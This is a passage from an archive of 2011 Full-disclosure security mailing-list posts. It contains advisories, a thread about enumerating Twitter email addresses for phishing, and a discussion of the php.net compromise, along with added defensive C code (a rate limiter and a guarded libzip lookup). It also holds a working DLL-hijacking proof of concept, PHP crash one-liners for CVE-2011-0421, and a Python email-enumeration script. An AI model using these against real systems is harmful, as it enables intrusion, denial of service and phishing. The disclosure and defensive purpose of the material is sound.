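/* 1 = serve the lookup; 0 = reject (HTTP 429, or hand the client a CAPTCHA). */
int rate_limit_allow(const char *key, double now)
{
    struct bucket *b = find_or_create(key, now);
    if (!b) return 0;                                /* fail closed when out of slots */
    double elapsed = now - b->last;
    if (elapsed > 0) {
        b->tokens += elapsed * REFILL_PER_SEC;
        if (b->tokens > BUCKET_CAPACITY) b->tokens = BUCKET_CAPACITY;
        b->last = now;
    }
    if (b->tokens >= 1.0) {
        b->tokens -= 1.0;
        return 1;
    }
    return 0;
}

/* Replay n lookups from one client, `interval` seconds apart, starting at
 * `start`; returns how many the limiter let through. */
int simulate_lookups(const char *key, int n, double start, double interval)
{
    int allowed = 0;
    for (int i = 0; i < n; i++)
        if (rate_limit_allow(key, start + i * interval)) allowed++;
    return allowed;
}

int main(void)
{
    rate_limit_reset();
    /* Constructed scenario: a script running a 400-name list at 10 req/s
     * from one address (addresses are documentation ranges, not real hosts). */
    int scripted = simulate_lookups("203.0.113.7", 400, 0.0, 0.1);
    /* A person correcting their address a few times over a minute. */
    int human = simulate_lookups("198.51.100.4", 5, 0.0, 12.0);
    printf("scripted client:    %d of 400 lookups served\n", scripted);
    printf("interactive client: %d of 5 lookups served\n", human);
    return 0;
}
```

The scripted client gets its first 20 answers and then roughly one every ten seconds, which turns a minutes-long enumeration into a days-long one and makes the traffic easy to spot in logs; the interactive client never notices the limiter. In production the table would live in a shared store rather than process memory, and the key would be chosen so that a single client cannot trivially rotate it.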
[Full-disclosure] Free Screen To Video V1.2 DLL Hijacking Exploit (iacenc.dll)
Hi guys,

You can find the software affected at:
http://www.koyotesoft.com/appli/Setup_FreeScreenVideo.exe

Thanks,
Metropolis

/*
# Exploit Title: Free Screen To Video V1.2 DLL Hijacking Exploit (iacenc.dll)
# Date: 15/03/2011
# Author: Metropolis
# Url: http://metropolis.fr.cr
# Software Link: http://www.koyotesoft.com/appli/Setup_FreeScreenVideo.exe
# Version: V1.2
# Tested on: Microsoft Windows XP Professional SP3 (FR)
# Instructions:
# 1. Compile dll
#    gcc -shared -o iacenc.dll FreeScreenVideo.c
# 2. Add iacenc.dll to
#    C:\Program Files\Free Screen To Video
# 3. Launch FreeScreenVideo.exe
# 4. MessageBox "DLL Hijacked!"
*/

#include <windows.h>

/* Prototype so the call from DllMain compiles without an implicit declaration. */
int dll_mll(void);

BOOL WINAPI DllMain(HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason) {
    case DLL_PROCESS_ATTACH:
        dll_mll();          /* runs as soon as the host process loads this DLL */
        break;
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}

int dll_mll(void)
{
    MessageBox(0, "DLL Hijacked!", "DLL Message", MB_OK);
    return 0;
}
[Full-disclosure] The Lots of Sex Risk and Security Project
Hi,

I posted a new article:
https://www.infosecisland.com/blogview/12596-The-Lots-of-Sex-Risk-and-Security-Project.html

There's some interesting info in there for pen testers who ply social
engineering or phishing tactics. But if you can come to the Troopers con
(troopers.de) at the end of the month, I'll be there discussing a lot of
these techniques in depth as well as giving examples of many, many more.

Sincerely,
-pete.

--
Pete Herzog - Managing Director - p...@isecom.org
ISECOM - Institute for Security and Open Methodologies
www.isecom.org - www.osstmm.org
www.hackerhighschool.org - www.badpeopleproject.org
[Full-disclosure] php.net compromised and php source backdoored
Hi

Someone reported a security incident about php.net:
http://www.wooyun.org/bugs/wooyun-2010-01635

The picture shows that some php.net site was compromised, and the hacker
backdoored the php source :)
[Full-disclosure] Password Security Presentation
Hi all,

Here is the copy of my recent presentation 'Primer on Password Security'
@ IIT Guwahati ISEA Security Conference
http://securityxploded.com/download/ISEA_IIT_Guwahati_2011_Password_Security_Presentation.zip

You can find complete coverage about the event here
http://tinyurl.com/6esq8us

Cheers
Nagareshwar
http://SecurityXploded.com
http://PasswordForensics.com/
http://twitter.com/securityxploded
Re: [Full-disclosure] Materials regarding Cyber-war
On 03/13/2011 07:13 PM, 김동욱 wrote:
> I'm looking for information or materials about cyberwar between nations
> for research purpose.

Check out /Inside Cyber Warfare/ by Jeffrey Carr, published by O'Reilly.
A little over a year old, it talks about most of the higher profile
pre-2010 cyberwar events.

http://oreilly.com/catalog/9780596802165

It's a good read. In it, he republishes a paper by a military officer on
dealing with cyber events and their legal ramifications.

hope that helps,
K

--
Ovi Mail: Making email access easy
http://mail.ovi.com
[Full-disclosure] OWASP AppSec USA 2011 Call For Papers
The OWASP AppSec USA 2011 Call for Papers (CFP) is now open. Visit the
following URL to submit your abstract for the September 22-23, 2011 talks
in Minneapolis, Minnesota:

http://www.appsecusa.org/talks.html

We're excited to announce that speakers will be in good company with our
first keynote, OWASP founder Mark Curphey, who will run with the theme of
"Community - The Killer App", much in the spirit of recent SXSW keynote
Christopher Poole (see
http://www.wired.com/underwire/2011/03/christopher-moot-poole/).

The CFP will close June 14, 2011. We look forward to talk submissions over
the coming months from security practitioners, researchers, thought
leaders, and developers in the following content areas:

* Cloud Security
* Mobile Security
* Secure SDLC
* OWASP Projects (turbo talks)
* Software Architecture Patterns for Security
* Software Development Platform Tutorials
* New Attacks & Defenses
* Thought Leadership (executive panels, interviews, and speeches)

Speakers will receive free admission (nontransferable) to the conference
in return for delivering a 50 minute talk or for delivering a 25 minute
OWASP Projects turbo talk.

Thanks, and have a great weekend!

OWASP AppSec USA 2011: Your life is in the cloud.
September 20-23
Training, Talks, CTF, and Showroom
www.appsecusa.org
@appsecusa
Re: [Full-disclosure] php.net compromised and php source backdoored
Happened 3 months ago;
http://bjori.blogspot.com/2010/12/php-project-and-code-review.html

One could theorize that the same user used the same password for the wiki
and had file upload permissions. Worrying that PHP.net didn't do a review
of everything that account could access.

On Fri, Mar 18, 2011 at 10:27 AM, sec yun <r...@wooyun.org> wrote:

> Hi
>
> Someone reported a security incident about php.net:
> http://www.wooyun.org/bugs/wooyun-2010-01635
>
> The picture shows that some php.net site was compromised, and the hacker
> backdoored the php source :)
[Full-disclosure] libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5)
[ libzip 0.9.3 _zip_name_locate NULL Pointer Dereference (incl PHP 5.3.5) ]

Author: Maksymilian Arciemowicz
http://securityreason.com/
http://cxib.net/

Date:
- Dis.: 03.01.2011
- Pub.: 18.03.2011

CVE: CVE-2011-0421
CERT: VU#325039

Affected Software:
- libzip 0.9.3
- PHP 5.3.5 (fixed 5.3.6)

Original URL:
http://securityreason.com/achievement_securityalert/96

--- 0.Description ---
libzip is a C library for reading, creating, and modifying zip archives. Files can be added from data buffers, files, or compressed data copied directly from other zip archives. Changes made without closing the archive can be reverted. The API is documented by man pages.

--- 1.Description ---
libzip allows remote and local attackers to cause a Denial of Service (Null Pointer Dereference) if the ZIP_FL_UNCHANGED flag is set.

--- lib/zip_name_locate.c ---
int
_zip_name_locate(struct zip *za, const char *fname, int flags,
                 struct zip_error *error)
{
    int (*cmp)(const char *, const char *);
    const char *fn, *p;
    int i, n;

    if (fname == NULL) {
        _zip_error_set(error, ZIP_ER_INVAL, 0);
        return -1;
    }

    cmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;
    n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;   <= CRASH HERE
--- lib/zip_name_locate.c ---

For an empty zip file and the ZIP_FL_UNCHANGED flag, libzip should crash.

Currently for PHP we estimate the security impact only as a remote DoS, so the risk is low.

Projects using libzip: KDE Utilities (4.x branch), MySQL Workbench, ckmame, fuse-zip, php zip extension, Endeavour2, FreeDink

A better analysis based on the PHP ZipArchive code is below.

--- 2. PHP 5.3.5 ZipArchive() ---
PoC1:
php -r '$nx=new ZipArchive();$nx->open("/dev/null");$nx->locateName("a",ZIPARCHIVE::FL_UNCHANGED);'

PoC2:
php -r '$nx=new ZipArchive();$nx->open("empty.zip");$nx->statName("a",ZIPARCHIVE::FL_UNCHANGED);'

Let's see

--- php_zip.c ---
...
static ZIPARCHIVE_METHOD(locateName)
{
...
    ZIP_FROM_OBJECT(intern, this);

    if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "s|l", &name, &name_len, &flags) == FAILURE) {
        return;
    }
...
    idx = (long)zip_name_locate(intern, (const char *)name, flags);   <=== CRASH IN THIS FUNCTION
...
--- php_zip.c ---

and let's see

--- zip_name_locate.c ---
ZIP_EXTERN(int)
zip_name_locate(struct zip *za, const char *fname, int flags)
{
    return _zip_name_locate(za, fname, flags, &za->error);
}

int
_zip_name_locate(struct zip *za, const char *fname, int flags,
                 struct zip_error *error)
{
    int (*cmp)(const char *, const char *);
    const char *fn, *p;
    int i, n;

    if (fname == NULL) {
        _zip_error_set(error, ZIP_ER_INVAL, 0);
        return -1;
    }

    cmp = (flags & ZIP_FL_NOCASE) ? strcmpi : strcmp;
    n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;   <=== CRASH HERE IF ZIPARCHIVE::FL_UNCHANGED

    for (i=0; i<n; i++) {
...
--- zip_name_locate.c ---

(gdb) bt
#0  0x006407cc in _zip_name_locate (za=0x118d520, fname=0x116ac70 "a", flags=32767, error=0x) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
#1  0x006381e6 in c_ziparchive_locateName (ht=2, return_value=0x1169418, return_value_ptr=0x, this_ptr=0x118d530, return_value_used=-176126592) at /build/buildd/php5-5.3.3/ext/zip/php_zip.c:1877
#2  0x006e986a in zend_do_fcall_common_helper_SPEC (execute_data=0x77eb7068) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:316
#3  0x006c0b00 in execute (op_array=0x1168568) at /build/buildd/php5-5.3.3/Zend/zend_vm_execute.h:107
...

Program received signal SIGSEGV, Segmentation fault.
0x006407cc in _zip_name_locate (za=0x118d520, fname=0x1169400 "9223372036854775808", flags=32767, error=0x) at /build/buildd/php5-5.3.3/ext/zip/lib/zip_name_locate.c:65
65          n = (flags & ZIP_FL_UNCHANGED) ? za->cdir->nentry : za->nentry;

(gdb) print za->cdir->nentry
Cannot access memory at address 0x8
(gdb) print za->nentry
$21 = 0

because

(gdb) x/i $rip
=> 0x6407cc <_zip_name_locate+236>:     mov    0x8(%rax),%eax
(gdb) x/i $rax
   0x0:     Cannot access memory at address 0x0
(gdb) x/i $eax

call to zip_name_locate

(gdb) n
1877        idx = (long)zip_name_locate(intern, (const char *)name, flags);
(gdb) print intern
$24 = (struct zip *) 0x118d580
(gdb) x/x intern
0x118d580:      0x0118d220
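As an added example, not libzip's, PHP's or the advisory author's code: a cut-down model of _zip_name_locate() that guards the ZIP_FL_UNCHANGED path when the archive has no central directory (za->cdir == NULL), which is exactly the state the two PoCs above produce. The struct layout, the flag and error values, and the fixture archives are assumptions made for this demonstration.

```c
#include <string.h>
#include <strings.h>
#include <stdio.h>

/* Flag and error values assumed for this demo (names mirror libzip's). */
#define ZIP_FL_NOCASE    1
#define ZIP_FL_UNCHANGED 8
#define ZIP_ER_NOENT     9
#define ZIP_ER_INVAL     18

struct zip_entry { const char *name; };
struct zip_cdir  { int nentry; struct zip_entry *entry; };  /* on-disk view */
struct zip_error { int zip_err; int sys_err; };
struct zip {
    struct zip_cdir  *cdir;    /* NULL when the archive was opened empty */
    int               nentry;  /* entries in the current (modified) view */
    struct zip_entry *entry;
    struct zip_error  error;
};

static void zip_error_set(struct zip_error *e, int ze, int se)
{
    if (e) { e->zip_err = ze; e->sys_err = se; }
}

/* Returns the index of fname in the requested view, or -1 with error set.
 * Unlike the listing above, an UNCHANGED lookup on an archive without a
 * central directory is answered with "no such entry" instead of a crash. */
int safe_name_locate(struct zip *za, const char *fname, int flags,
                     struct zip_error *error)
{
    int (*cmp)(const char *, const char *);
    const struct zip_entry *tab;
    int i, n;

    if (za == NULL || fname == NULL) {
        zip_error_set(error, ZIP_ER_INVAL, 0);
        return -1;
    }
    cmp = (flags & ZIP_FL_NOCASE) ? strcasecmp : strcmp;

    if (flags & ZIP_FL_UNCHANGED) {
        if (za->cdir == NULL) {          /* the /dev/null and empty.zip cases */
            zip_error_set(error, ZIP_ER_NOENT, 0);
            return -1;
        }
        n = za->cdir->nentry;
        tab = za->cdir->entry;
    } else {
        n = za->nentry;
        tab = za->entry;
    }
    for (i = 0; i < n; i++)
        if (tab[i].name != NULL && cmp(tab[i].name, fname) == 0)
            return i;

    zip_error_set(error, ZIP_ER_NOENT, 0);
    return -1;
}

/* Constructed fixtures: an archive opened empty, and one whose current view
 * has an entry ("new.txt") that the unchanged on-disk view does not. */
static struct zip_entry disk_entries[] = { { "README" }, { "src/main.c" } };
static struct zip_cdir  disk_cdir = { 2, disk_entries };
static struct zip_entry cur_entries[] = { { "README" }, { "src/main.c" }, { "new.txt" } };

struct zip empty_archive(void)     { struct zip za = { NULL, 0, NULL, { 0, 0 } }; return za; }
struct zip populated_archive(void) { struct zip za = { &disk_cdir, 3, cur_entries, { 0, 0 } }; return za; }

int main(void)
{
    struct zip za = empty_archive();
    struct zip_error err = { 0, 0 };
    int idx = safe_name_locate(&za, "a", ZIP_FL_UNCHANGED, &err);
    printf("empty archive, FL_UNCHANGED: idx=%d err=%d\n", idx, err.zip_err);
    za = populated_archive();
    printf("new.txt: current=%d unchanged=%d\n",
           safe_name_locate(&za, "new.txt", 0, &err),
           safe_name_locate(&za, "new.txt", ZIP_FL_UNCHANGED, &err));
    return 0;
}
```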
Re: [Full-disclosure] php.net compromised and php source backdoored
They've been targeting apache, php, sourceforge, and all popular opensource ware sites.

On Fri, Mar 18, 2011 at 10:03 PM, Benji <m...@b3nji.com> wrote:
> Happened 3 months ago; http://bjori.blogspot.com/2010/12/php-project-and-code-review.html
>
> One could theorize that the same user used the same password for the wiki and had file upload permissions. Worrying that PHP.net didn't do a review of everything that account could access.
>
> On Fri, Mar 18, 2011 at 10:27 AM, sec yun <r...@wooyun.org> wrote:
>> Hi
>>
>> Someone reported a security incident about php.net
>> http://www.wooyun.org/bugs/wooyun-2010-01635
>>
>> The picture shows that some php.net site was compromised, and the hacker backdoored the php source :)
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
with services like decaptcher and deathbycaptcha this would not be a hindrance anyway

2011/3/15 Cal Leeming <c...@foxwhisper.co.uk>
> Agreed. These public API methods should have brute force protection at the very least. But, because they want instant in-line form validation for email address availability, this makes it difficult.
>
> In an ideal world, they'd have a CAPTCHA on the form, and only validate upon submit with a valid captcha.
>
> On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills <cont...@reverseskills.com> wrote:
>> The problem is to allow unlimited access to that resource, not the resource itself.
>>
>> 2011/3/15 Cal Leeming <c...@foxwhisper.co.uk>:
>>> This conceptual flaw exists in most web apps which have a reset password by email address feature, as most will display an error if the email address does not exist in their database.
>>>
>>> On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills <cont...@reverseskills.com> wrote:
>>>> Simple and easy way to get a list of email accounts used on Twitter. For Phishing campaigns, custom Spam...
>>>>
>>>> Twitter has been notified and I suppose someday it will be fixed if they think it should be filtered.
>>>>
>>>> When you create a new Twitter account, the form requests a mailing address. Twitter verifies that the email account is not being used, but does not check any user token or limit the usage (captcha/block).
>>>>
>>>> https://twitter.com/signup -> http://twitter.com/users/email_available?email=
>>>>
>>>> We just need to automate it with a simple script, ***Everything you do will be your responsibility***
>>>>
>>>> ---
>>>> #!/usr/bin/python
>>>> import sys, json, urllib2, os
>>>> f = urllib2.urlopen("http://twitter.com/users/email_available?email=" + sys.argv[1])
>>>> data = json.load(f)
>>>> def valid()
>>>> ..
>>>> "Email has already been taken" in data["msg"] --> reply
>>>> ..
>>>> ---
>>>>
>>>> We just need a list of users to test.. for example: http://twitter.com/about/employees (don't be evil is just an example!)
>>>>
>>>> Parsing the name/nickname and testing {user}@twitter.com, a few minutes later we have a list of ~400 valid internal email addresses *@twitter.com.
>>>>
>>>> An attacker could probably.. a brute force attack (Google Apps), send Phishing or try to exploit some browser bugs or similar. #Aurora #Google.
>>>>
>>>> Most of these e-mails are internal, not public.. There are also some that make you think they are used for such A-Directory system users:
>>>> ..
>>>> apa...@twitter.com
>>>> r...@twitter.com
>>>> m...@twitter.com
>>>> ..
>>>>
>>>> But, if you download a database Rockyou / Singles.org / Gawker / Rootkit.com or just typical dictionaries and domains, it will be quite easy to get hold of a list of users large enough (*@hotmail.com, *@gmail.com, etc). For example in my case I used it to find user accounts in a pentest of a company that used Twitter.
>>>>
>>>> But probably not a good idea to allow unlimited access, a malicious user could use these user lists for Spam or Phishing.
>>>>
>>>> --
>>>> Security Researcher
>>>> http://twitter.com/revskills
>>>> --
Re: [Full-disclosure] Using Twitter for Phishing Campaign / Spam / Followers?
Lol, I didn't know about the commercial product 'decaptcher'. For shits and giggles, I was going to write a decaptcha myself and release it as open source, never had time though :S

One option would be to apply rate limitations to API calls per IP.

Or, possibly some really heavily obfuscated JS which does key calculation with a matching server side algo, and injects the value into the form upon submission. This is one of the methods we use on our paid adult sites. Unless the person is really determined (and has the patience to deobfuscate, then port to their own code), or their bots have spidermonkey built in, then it usually fends off most botters. To make it harder, we also have a library of about 500 of these (each with a different key build algo), which are cycled automatically lol.

Example:

    $(function() {
    var _0xafd3=["\x74\x20\x3D\x20\x22","","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x72\x65\x70\x6C\x61\x63\x65","\x22"];eval(_0xafd3[0]+s[_0xafd3[5]](/ZPAK/gi,_0xafd3[1])[_0xafd3[5]](/\"\,\"/gi,_0xafd3[1])[_0xafd3[5]](/\"/gi,_0xafd3[1])[_0xafd3[4]](_0xafd3[1])[_0xafd3[3]]()[_0xafd3[2]](_0xafd3[1])+_0xafd3[6]);
    var _0x5bfa=["\x3C\x69\x6E\x70\x75\x74\x20\x2F\x3E","\x74\x79\x70\x65","\x68\x69\x64\x64\x65\x6E","\x61\x74\x74\x72","\x6E\x61\x6D\x65","\x73\x65\x65\x64\x6B\x65\x79","\x76\x61\x6C\x75\x65","\x61\x70\x70\x65\x6E\x64","\x23\x74\x68\x65\x66\x6F\x72\x6D"];_n=$(_0x5bfa[0]);_n[_0x5bfa[3]](_0x5bfa[1],_0x5bfa[2]);_n[_0x5bfa[3]](_0x5bfa[4],_0x5bfa[5]);_n[_0x5bfa[3]](_0x5bfa[6],t);$(_0x5bfa[8])[_0x5bfa[7]](_n);
    });

Again, not perfect, but it's worked well for us :)

On Fri, Mar 18, 2011 at 3:58 PM, huj huj huj <datski...@gmail.com> wrote:
> with services like decaptcher and deathbycaptcha this would not be a hindrance anyway
>
> 2011/3/15 Cal Leeming <c...@foxwhisper.co.uk>
>> Agreed. These public API methods should have brute force protection at the very least. But, because they want instant in-line form validation for email address availability, this makes it difficult.
>>
>> In an ideal world, they'd have a CAPTCHA on the form, and only validate upon submit with a valid captcha.
>>
>> On Tue, Mar 15, 2011 at 3:02 PM, Reverse Skills <cont...@reverseskills.com> wrote:
>>> The problem is to allow unlimited access to that resource, not the resource itself.
>>>
>>> 2011/3/15 Cal Leeming <c...@foxwhisper.co.uk>:
>>>> This conceptual flaw exists in most web apps which have a reset password by email address feature, as most will display an error if the email address does not exist in their database.
>>>>
>>>> On Tue, Mar 15, 2011 at 12:19 PM, Reverse Skills <cont...@reverseskills.com> wrote:
>>>>> Simple and easy way to get a list of email accounts used on Twitter. For Phishing campaigns, custom Spam...
>>>>>
>>>>> Twitter has been notified and I suppose someday it will be fixed if they think it should be filtered.
>>>>>
>>>>> When you create a new Twitter account, the form requests a mailing address. Twitter verifies that the email account is not being used, but does not check any user token or limit the usage (captcha/block).
>>>>>
>>>>> https://twitter.com/signup -> http://twitter.com/users/email_available?email=
>>>>>
>>>>> We just need to automate it with a simple script, ***Everything you do will be your responsibility***
>>>>>
>>>>> ---
>>>>> #!/usr/bin/python
>>>>> import sys, json, urllib2, os
>>>>> f = urllib2.urlopen("http://twitter.com/users/email_available?email=" + sys.argv[1])
>>>>> data = json.load(f)
>>>>> def valid()
>>>>> ..
>>>>> "Email has already been taken" in data["msg"] --> reply
>>>>> ..
>>>>> ---
>>>>>
>>>>> We just need a list of users to test.. for example: http://twitter.com/about/employees (don't be evil is just an example!)
>>>>>
>>>>> Parsing the name/nickname and testing {user}@twitter.com, a few minutes later we have a list of ~400 valid internal email addresses *@twitter.com.
>>>>>
>>>>> An attacker could probably.. a brute force attack (Google Apps), send Phishing or try to exploit some browser bugs or similar. #Aurora #Google.
>>>>>
>>>>> Most of these e-mails are internal, not public.. There are also some that make you think they are used for such A-Directory system users:
>>>>> ..
>>>>> apa...@twitter.com
>>>>> r...@twitter.com
>>>>> m...@twitter.com
>>>>> ..
>>>>>
>>>>> But, if you download a database Rockyou / Singles.org / Gawker / Rootkit.com or just typical dictionaries and domains, it will be quite easy to get hold of a list of users large enough (*@hotmail.com, *@gmail.com, etc). For example in my case I used it to find user accounts in a pentest of a company that used Twitter.
>>>>>
>>>>> But probably not a good idea to allow unlimited access, a malicious user could use these user lists for Spam or Phishing.
>>>>>
>>>>> --
>>>>> Security Researcher
>>>>> http://twitter.com/revskills
>>>>> --
[Full-disclosure] [USN-1089-1] Linux kernel vulnerabilities
===
Ubuntu Security Notice USN-1089-1                                 March 18, 2011
linux, linux-ec2 vulnerabilities
CVE-2010-4076, CVE-2010-4077, CVE-2010-4158, CVE-2010-4162, CVE-2010-4163, CVE-2010-4175, CVE-2010-4242
===

A security issue affects the following Ubuntu releases:

Ubuntu 9.10

This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu.

The problem can be corrected by upgrading your system to the following package versions:

Ubuntu 9.10:
  linux-image-2.6.31-23-386            2.6.31-23.74
  linux-image-2.6.31-23-generic        2.6.31-23.74
  linux-image-2.6.31-23-generic-pae    2.6.31-23.74
  linux-image-2.6.31-23-ia64           2.6.31-23.74
  linux-image-2.6.31-23-lpia           2.6.31-23.74
  linux-image-2.6.31-23-powerpc        2.6.31-23.74
  linux-image-2.6.31-23-powerpc-smp    2.6.31-23.74
  linux-image-2.6.31-23-powerpc64-smp  2.6.31-23.74
  linux-image-2.6.31-23-server         2.6.31-23.74
  linux-image-2.6.31-23-sparc64        2.6.31-23.74
  linux-image-2.6.31-23-sparc64-smp    2.6.31-23.74
  linux-image-2.6.31-23-virtual        2.6.31-23.74
  linux-image-2.6.31-308-ec2           2.6.31-308.28

After a standard system update you need to reboot your computer to make all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. If you use linux-restricted-modules, you have to update that package as well to get modules which work with the new kernel version. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-server, linux-powerpc), a standard system upgrade will automatically perform this as well.

Details follow:

Dan Rosenberg discovered that multiple terminal ioctls did not correctly initialize structure memory. A local attacker could exploit this to read portions of kernel stack memory, leading to a loss of privacy. (CVE-2010-4076, CVE-2010-4077)

Dan Rosenberg discovered that the socket filters did not correctly initialize structure memory. A local attacker could create malicious filters to read portions of kernel stack memory, leading to a loss of privacy. (CVE-2010-4158)

Dan Rosenberg discovered that certain iovec operations did not calculate page counts correctly. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4162)

Dan Rosenberg discovered that the SCSI subsystem did not correctly validate iov segments. A local attacker with access to a SCSI device could send specially crafted requests to crash the system, leading to a denial of service. (CVE-2010-4163)

Dan Rosenberg discovered that the RDS protocol did not correctly check ioctl arguments. A local attacker could exploit this to crash the system, leading to a denial of service. (CVE-2010-4175)

Alan Cox discovered that the HCI UART driver did not correctly check if a write operation was available. If the mmap_min_addr sysctl was changed from the Ubuntu default to a value of 0, a local attacker could exploit this flaw to gain root privileges. (CVE-2010-4242)

Updated packages for Ubuntu 9.10:
[Full-disclosure] ZDI-11-105: Hewlett-Packard Client Automation radexecd.exe Remote Code Execution Vulnerability
ZDI-11-105: Hewlett-Packard Client Automation radexecd.exe Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-105
March 18, 2011

-- CVE ID:
CVE-2011-0889

-- CVSS:
10, (AV:N/AC:L/Au:N/C:C/I:C/A:C)

-- Affected Vendors:
Hewlett-Packard

-- Affected Products:
Hewlett-Packard Client Automation

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10841. For further product information on the TippingPoint IPS, visit:
    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of HP Client Automation. Authentication is not required to exploit this vulnerability.

The flaw exists within the radexecd.exe component which listens by default on TCP port 3465. When handling a remote execute request the process does not properly authenticate the user issuing the request. Utilities are stored in the 'secure' path which enable an attacker to re-execute an arbitrary executable. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the SYSTEM user.

-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More details can be found at:
    http://h2.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02750690

-- Disclosure Timeline:
2010-09-23 - Vulnerability reported to vendor
2011-03-18 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Anonymous

-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities.

Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at:
    http://www.zerodayinitiative.com

The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product.

Our vulnerability disclosure policy is available online at:
    http://www.zerodayinitiative.com/advisories/disclosure_policy/

Follow the ZDI on Twitter:
    http://twitter.com/thezdi
[Full-disclosure] ZDI-11-106: Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability
ZDI-11-106: Novell Netware NWFTPD.NLM DELE Remote Code Execution Vulnerability
http://www.zerodayinitiative.com/advisories/ZDI-11-106
March 18, 2011

-- CVE ID:
CVE-2010-4228

-- CVSS:
9, (AV:N/AC:L/Au:S/C:C/I:C/A:C)

-- Affected Vendors:
Novell

-- Affected Products:
Novell Netware

-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 10659. For further product information on the TippingPoint IPS, visit:
    http://www.tippingpoint.com

-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Novell Netware. Authentication is required to exploit this vulnerability.

The flaw exists within NWFTPD.NLM. When handling the argument provided to the DELE command the application copies user supplied data to a fixed length stack buffer. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the super user.

-- Vendor Response:
Novell has issued an update to correct this vulnerability. More details can be found at:
    http://download.novell.com/Download?buildid=Ax6AbxwGLTs~

-- Disclosure Timeline:
2010-09-22 - Vulnerability reported to vendor
2011-03-18 - Coordinated public release of advisory

-- Credit:
This vulnerability was discovered by:
    * Francis Provencher for Protek Research Lab's